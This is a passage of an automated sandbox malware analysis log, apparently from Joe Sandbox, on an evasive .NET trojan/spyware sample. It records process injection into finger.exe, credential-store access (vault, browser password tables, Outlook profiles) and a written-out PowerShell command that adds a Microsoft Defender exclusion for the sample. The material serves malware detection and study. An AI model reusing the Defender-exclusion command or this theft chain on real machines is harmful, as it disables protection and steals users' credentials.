                Source: QmBbqpEHu0.exe, 00000004.00000002.2285714883.00000000009B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefinger.exej% vs QmBbqpEHu0.exe
                Source: QmBbqpEHu0.exeBinary or memory string: OriginalFilenameHszP.exe: vs QmBbqpEHu0.exe
                Source: QmBbqpEHu0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: QmBbqpEHu0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@11/6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QmBbqpEHu0.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2g0rrok.24y.ps1Jump to behavior
                Source: QmBbqpEHu0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: QmBbqpEHu0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2479557008.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2480938314.0000000000E95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: QmBbqpEHu0.exeReversingLabs: Detection: 78%
                Source: QmBbqpEHu0.exeVirustotal: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\QmBbqpEHu0.exe "C:\Users\user\Desktop\QmBbqpEHu0.exe"
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe"
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess created: C:\Users\user\Desktop\QmBbqpEHu0.exe "C:\Users\user\Desktop\QmBbqpEHu0.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess created: C:\Users\user\Desktop\QmBbqpEHu0.exe "C:\Users\user\Desktop\QmBbqpEHu0.exe"Jump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: QmBbqpEHu0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: QmBbqpEHu0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: QmBbqpEHu0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: HszP.pdbSHA256 source: QmBbqpEHu0.exe
                Source: Binary string: finger.pdb source: QmBbqpEHu0.exe, 00000004.00000002.2285714883.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000002.3587143350.000000000167E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cqvjCApYGBKzop.exe, 00000009.00000002.3586427956.000000000097E000.00000002.00000001.01000000.0000000D.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000000.2358690186.000000000097E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: HszP.pdb source: QmBbqpEHu0.exe
                Source: Binary string: wntdll.pdbUGP source: QmBbqpEHu0.exe, 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2285870357.0000000003150000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2289344794.0000000003304000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: QmBbqpEHu0.exe, QmBbqpEHu0.exe, 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 0000000A.00000003.2285870357.0000000003150000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2289344794.0000000003304000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: QmBbqpEHu0.exe, 00000004.00000002.2285714883.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000002.3587143350.000000000167E000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747DDE0 push eax; retf 0_2_0747DDE1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0041605F push ecx; iretd 4_2_00416097
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00416063 push ecx; iretd 4_2_00416097
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00416833 push edx; iretd 4_2_00416835
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00414884 push FFFFFFEBh; iretd 4_2_00414887
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_004018BF push ds; ret 4_2_004018C8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00412118 push esi; retf 4_2_00412119
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0040DA11 push ecx; retf 4_2_0040DA30
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_004022BC push ds; ret 4_2_004022BD
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00415B50 push ebx; ret 4_2_00415B5D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00415B53 push ebx; ret 4_2_00415B5D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00415BC8 push es; ret 4_2_00415BEA
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0040DBAD push cs; retf 4_2_0040DBAE
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00415C27 push es; ret 4_2_00415BEA
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_004034A0 push eax; ret 4_2_004034A2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_004145C0 push esi; iretd 4_2_004145AC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00414595 push esi; iretd 4_2_004145AC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00404E54 pushad ; retf 4_2_00404E66
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00414E5A push D3374C68h; ret 4_2_00414E6C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00417E9B pushfd ; iretd 4_2_00417E9D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00411F0E push C2AE7667h; retf 4_2_00411F15
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC09AD push ecx; mov dword ptr [esp], ecx4_2_00FC09B6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034B225F pushad ; ret 10_2_034B27F9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034B27FA pushad ; ret 10_2_034B27F9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034E09AD push ecx; mov dword ptr [esp], ecx10_2_034E09B6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034B283D push eax; iretd 10_2_034B2858
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034B135E push eax; iretd 10_2_034B1369
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009C41C0 pushfd ; retf AE7Ch10_2_009C4308
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009BC3A5 push edi; iretd 10_2_009BC3A6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009C2570 push esi; retf E201h10_2_009C25E4
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009B26B0 push ebx; ret 10_2_009B26BA
                Source: QmBbqpEHu0.exeStatic PE information: section name: .text entropy: 7.659098571397496

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
